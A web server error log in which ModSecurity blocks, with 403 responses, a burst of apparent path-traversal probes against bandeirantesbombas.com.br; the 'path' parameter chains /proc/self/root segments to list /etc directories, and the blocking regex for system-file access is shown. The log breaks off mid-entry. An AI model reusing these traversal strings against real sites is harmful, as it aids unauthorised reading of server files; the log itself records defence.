[Mon Mar 16 14:51:36.464871 2026] [:error] [pid 21806:tid 140411725141760] [client 74.7.241.46:58916] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhDKNSswJuvopo3lOhp9QAAAII"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 14:51:37.223801 2026] [:error] [pid 10651:tid 140411632822016] [client 74.7.243.203:33074] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhDKbysWC90G-1nBrBP5gAAAY0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 14:51:37.858346 2026] [:error] [pid 10831:tid 140411557287680] [client 74.7.241.46:58926] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhDKY6lpbStxTqkSkt3KAAAAlY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 14:51:38.664722 2026] [:error] [pid 21533:tid 140411741927168] [client 74.7.243.203:33084] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhDKnjZBu2q05ozVU9llAAAAUA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 14:51:39.242455 2026] [:error] [pid 15568:tid 140411658000128] [client 74.7.241.46:35554] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhDK6QpVkWug9HeOt9BmgAAA0o"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 14:51:40.078636 2026] [:error] [pid 15061:tid 140411725141760] [client 74.7.243.203:33090] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhDLKTCbgAP5jq5Teg32AAAAsI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 14:51:40.635985 2026] [:error] [pid 15061:tid 140411741927168] [client 74.7.241.46:35560] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhDLKTCbgAP5jq5Teg32QAAAsA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 14:51:41.851549 2026] [:error] [pid 14895:tid 140411540502272] [client 74.7.241.46:35576] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhDLVajLEzk2WiQ-10dVAAAApg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 14:51:42.613406 2026] [:error] [pid 10772:tid 140411574073088] [client 74.7.243.203:39686] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhDLv9ocpUE4ed4uDz7CQAAAhQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 14:51:44.727856 2026] [:error] [pid 15568:tid 140411590858496] [client 74.7.243.203:39702] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhDMKQpVkWug9HeOt9BnAAAA1I"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 14:51:46.953333 2026] [:error] [pid 15061:tid 140411582465792] [client 74.7.241.46:35586] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhDMaTCbgAP5jq5Teg32wAAAtM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 14:51:46.954761 2026] [:error] [pid 10772:tid 140411607643904] [client 74.7.243.203:39710] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhDMv9ocpUE4ed4uDz7DAAAAhA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 14:51:49.887427 2026] [:error] [pid 11972:tid 140411683178240] [client 74.7.241.46:45252] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhDNZqj1wV0Si-Okef6awAAAAc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 14:51:51.762028 2026] [:error] [pid 21805:tid 140411733534464] [client 74.7.241.46:45264] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhDN7ABkC4fWIHEf8H7CAAAAEE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 14:51:53.186126 2026] [:error] [pid 21533:tid 140411683178240] [client 74.7.241.46:45268] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhDOXjZBu2q05ozVU9lmAAAAUc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 14:51:54.108235 2026] [:error] [pid 15568:tid 140411540502272] [client 74.7.243.203:39724] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhDOqQpVkWug9HeOt9BoQAAA1g"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 14:51:55.469661 2026] [:error] [pid 15061:tid 140411658000128] [client 74.7.243.203:46752] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhDO6TCbgAP5jq5Teg33QAAAso"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 14:51:55.699928 2026] [:error] [pid 21806:tid 140411658000128] [client 74.7.241.46:45276] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhDO9SswJuvopo3lOhp-wAAAIo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 14:51:57.069626 2026] [:error] [pid 11972:tid 140411632822016] [client 74.7.241.46:45286] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhDPZqj1wV0Si-Okef6bQAAAA0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 14:51:57.713229 2026] [:error] [pid 10831:tid 140411616036608] [client 74.7.243.203:46756] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhDPY6lpbStxTqkSkt3MAAAAk8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 14:51:58.663884 2026] [:error] [pid 21805:tid 140411691570944] [client 74.7.241.46:50400] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhDPrABkC4fWIHEf8H7DQAAAEY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 14:51:59.149916 2026] [:error] [pid 21806:tid 140411540502272] [client 74.7.243.203:46772] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id 